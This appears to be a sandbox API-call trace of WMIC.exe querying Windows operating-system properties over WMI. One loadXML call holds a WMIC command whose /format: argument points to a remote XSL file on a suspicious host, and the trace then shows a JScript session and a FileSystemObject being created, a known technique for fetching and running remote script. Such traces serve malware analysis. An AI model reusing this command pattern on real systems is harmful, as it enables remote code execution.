[0059.037] IWbemClassObject:Get (in: This=0x21e2428, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="QuantumLength", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="QuantumType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e25c0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e25c0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="QuantumType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="RegisteredUser", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e2758, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e2758, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="RegisteredUser", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SerialNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e28f0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e28f0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SerialNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ServicePackMajorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e2a88, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e2a88, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ServicePackMajorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ServicePackMinorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2c20, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2c20, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ServicePackMinorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SizeStoredInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2db8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2db8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SizeStoredInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Status", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2f50, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDevice", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e2f50, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Status", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e30e8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDevice", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDirectory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e30e8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e3280, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDirectory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDrive", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] IWbemClassObject:Get (in: This=0x21e3280, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDrive", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.038] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e3418, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="SystemDrive", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalSwapSpaceSize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e3418, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="SystemDrive", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalSwapSpaceSize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e35b0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalSwapSpaceSize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVirtualMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e35b0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalSwapSpaceSize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalVirtualMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e3748, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVirtualMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVisibleMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] IWbemClassObject:Get (in: This=0x21e3748, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalVirtualMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalVisibleMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.039] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.040] IWbemClassObject:Get (in: This=0x21e8fc8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="TotalVisibleMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.040] IWbemClassObject:Get (in: This=0x21e8fc8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="TotalVisibleMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Version", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.040] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.040] IWbemClassObject:Get (in: This=0x21e9160, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsDirectory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.040] IWbemClassObject:Get (in: This=0x21e9160, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Version", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="WindowsDirectory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.040] ?Format@CHString@@QAAXPBGZZ () returned 0x7f644
[0059.040] WbemLocator:IUnknown:AddRef (This=0x490828) returned 0x3
[0059.041] lstrlenW (lpString="") returned 0
[0059.041] lstrlenW (lpString="CRH2YWU7") returned 8
[0059.041] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3
[0059.041] lstrlenW (lpString="CRH2YWU7") returned 8
[0059.042] WbemLocator:IWbemLocator:ConnectServer (in: This=0x490828, strNetworkResource="\\\\CRH2YWU7\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc204 | out: ppNamespace=0x8dc204*=0x21eb7f4) returned 0x0
[0059.047] CoSetProxyBlanket (pProxy=0x21eb7f4, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0059.047] IWbemServices:ExecQuery (in: This=0x21eb7f4, strQueryLanguage="WQL", strQuery="SELECT XBRSEWYL, FreePhysicalMemory FROM Win32_OperatingSystem", lFlags=48, pCtx=0x0, ppEnum=0xcb48c | out: ppEnum=0xcb48c*=0x21eb914) returned 0x0
[0059.050] CoSetProxyBlanket (pProxy=0x21eb914, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0059.052] IEnumWbemClassObject:Next (in: This=0x21eb914, lTimeout=-1, uCount=0x1, apObjects=0xcb488, puReturned=0xcb480 | out: apObjects=0xcb488*=0x0, puReturned=0xcb480*=0x0) returned 0x80041017
[0059.067] _CxxThrowException ()
[0059.067] IUnknown:Release (This=0x21eb914) returned 0x0
[0059.068] ??1CHString@@QAE@XZ () returned 0x6f900504
[0059.068] LoadStringW (in: hInstance=0x0, uID=0xb7f5, lpBuffer=0xced9c, cchBufferMax=1024 | out: lpBuffer="Node - %1\r\n") returned 0xb
[0059.068] FormatMessageW (in: dwFlags=0x2500, lpSource=0xced9c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xced98, nSize=0x0, Arguments=0xced84 | out: lpBuffer="\xbd48\x29\x4e\x6f\x64\x65\x20\x2d\x20\x25\x31\x0d\x0a") returned 0x11
[0059.069] ?Format@CHString@@QAAXPBGZZ () returned 0x7f644
[0059.072] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0xced1c, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18
[0059.072] FormatMessageW (in: dwFlags=0x2500, lpSource=0xced1c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xced18, nSize=0x0, Arguments=0xced04 | out: lpBuffer="\x42f0\x25\x45\x52\x52\x4f\x52\x3a\x0d\x0a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x3d\x20\x25\x31") returned 0x25
[0059.072] ??YCHString@@QAEABV0@PBG@Z () returned 0xcf5b4
[0059.072] GetCurrentThreadId () returned 0xa9c
[0059.072] ??1CHString@@QAE@XZ () returned 0x1
[0059.072] ?Format@CHString@@QAAXPBGZZ () returned 0x1d73ffc
[0059.072] ?Format@CHString@@QAAXPBGZZ () returned 0x7f644
[0059.072] ?Format@CHString@@QAAXPBGZZ () returned 0x7fa7c
[0059.073] ?Format@CHString@@QAAXPBGZZ () returned 0x1d73ffc
[0059.074] _kbhit () returned 0x0
[0059.075] ??YCHString@@QAEABV0@PBG@Z () returned 0xcf594
[0059.075] lstrlenW (lpString="LIST") returned 4
[0059.075] lstrlenW (lpString="get") returned 3
[0059.075] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0059.075] lstrlenW (lpString="ASSOC") returned 5
[0059.075] lstrlenW (lpString="get") returned 3
[0059.075] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0059.075] lstrlenW (lpString="GET") returned 3
[0059.075] lstrlenW (lpString="get") returned 3
[0059.075] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0059.075] GetCurrentThreadId () returned 0xa9c
[0059.075] ??0CHString@@QAE@XZ () returned 0xcf508
[0059.075] CoCreateInstance (in: rclsid=0x896d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x8dc214 | out: ppv=0x8dc214*=0x16b9bc8) returned 0x0
[0059.076] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x16b9bc8, bstrXML=" os get XBRSEWYL, freephysicalmemory /format:"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641"CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON0x80041017Invalid query\r\nWMI", isSuccessful=0xcf504 | out: isSuccessful=0xcf504*=0xffff) returned 0x0
[0059.076] ??0CHString@@QAE@XZ () returned 0xcf4b0
[0059.076] GetCurrentThreadId () returned 0xa9c
[0059.556] EtwRegisterTraceGuidsA () returned 0x0
[0059.556] GetProcAddress (hModule=0x76da0000, lpProcName="RegisterTraceGuidsA") returned 0x76f2fb7d
[0059.556] EtwRegisterTraceGuidsA () returned 0x0
[0059.556] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xcdb5c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
[0059.557] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0059.557] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0xcdc80 | out: phkResult=0xcdc80*=0x0) returned 0x2
[0059.562] CoCreateInstance (in: rclsid=0x6d1e15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d1e15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x1d74bc4 | out: ppv=0x1d74bc4*=0x2c54e8) returned 0x0
[0059.562] IUnknown:AddRef (This=0x2c54e8) returned 0x2
[0059.562] GetCurrentProcessId () returned 0xa98
[0059.562] GetCurrentThreadId () returned 0xa9c
[0059.562] GetTickCount () returned 0x1cfad
[0059.562] ISystemDebugEventFire:BeginSession (This=0x2c54e8, guidSourceID=0x6d1e16d4, strSessionName="JScript:00002712:00002716:18118701") returned 0x0
[0059.562] GetCurrentThreadId () returned 0xa9c
[0059.567] ISystemDebugEventFire:EndSession (This=0x2c54e8) returned 0x0
[0059.567] IUnknown:Release (This=0x2c54e8) returned 0x1
[0059.567] IUnknown:Release (This=0x2c54e8) returned 0x0
[0059.567] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x16b9bc8) returned 0x2
[0059.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0059.567] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xcf390 | out: lpConsoleScreenBufferInfo=0xcf390) returned 1
[0059.569] CoCreateInstance (in: rclsid=0x6d1e15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d1e15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x1d74bc4 | out: ppv=0x1d74bc4*=0x2c5578) returned 0x0
[0059.569] IUnknown:AddRef (This=0x2c5578) returned 0x2
[0059.569] GetCurrentProcessId () returned 0xa98
[0059.569] GetCurrentThreadId () returned 0xa9c
[0059.569] GetTickCount () returned 0x1cfad
[0059.569] ISystemDebugEventFire:BeginSession (This=0x2c5578, guidSourceID=0x6d1e16d4, strSessionName="JScript:00002712:00002716:18118701") returned 0x0
[0059.570] CoGetObjectContext (in: riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcf190 | out: ppv=0xcf190*=0x246958) returned 0x0
[0059.570] CGIPTable::RegisterInterfaceInGlobal () returned 0x0
[0059.570] IUnknown:AddRef (This=0x246958) returned 0x2
[0059.570] IUnknown:Release (This=0x246958) returned 0x1
[0059.570] GetTickCount () returned 0x1cfbc
[0059.571] ISystemDebugEventFire:IsActive (This=0x2c5578) returned 0x1
[0059.571] CoGetObjectContext (in: riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcf1dc | out: ppv=0xcf1dc*=0x246958) returned 0x0
[0059.571] IUnknown:Release (This=0x246958) returned 0x1
[0059.572] CoGetClassObject (in: rclsid=0xceda4*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x7e3e0) returned 0x0
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e3e0, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IClassFactory:CreateInstance (in: This=0x7e3e0, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x7e400) returned 0x0
[0059.583] FileSystemObject:IUnknown:Release (This=0x7e3e0) returned 0x0
[0059.583] GetProcAddress (hModule=0x76a20000, lpProcName="CoTaskMemFree") returned 0x76a76f41
[0059.583] CoTaskMemFree (pv=0x290780)
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e400, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x7e400) returned 0x0
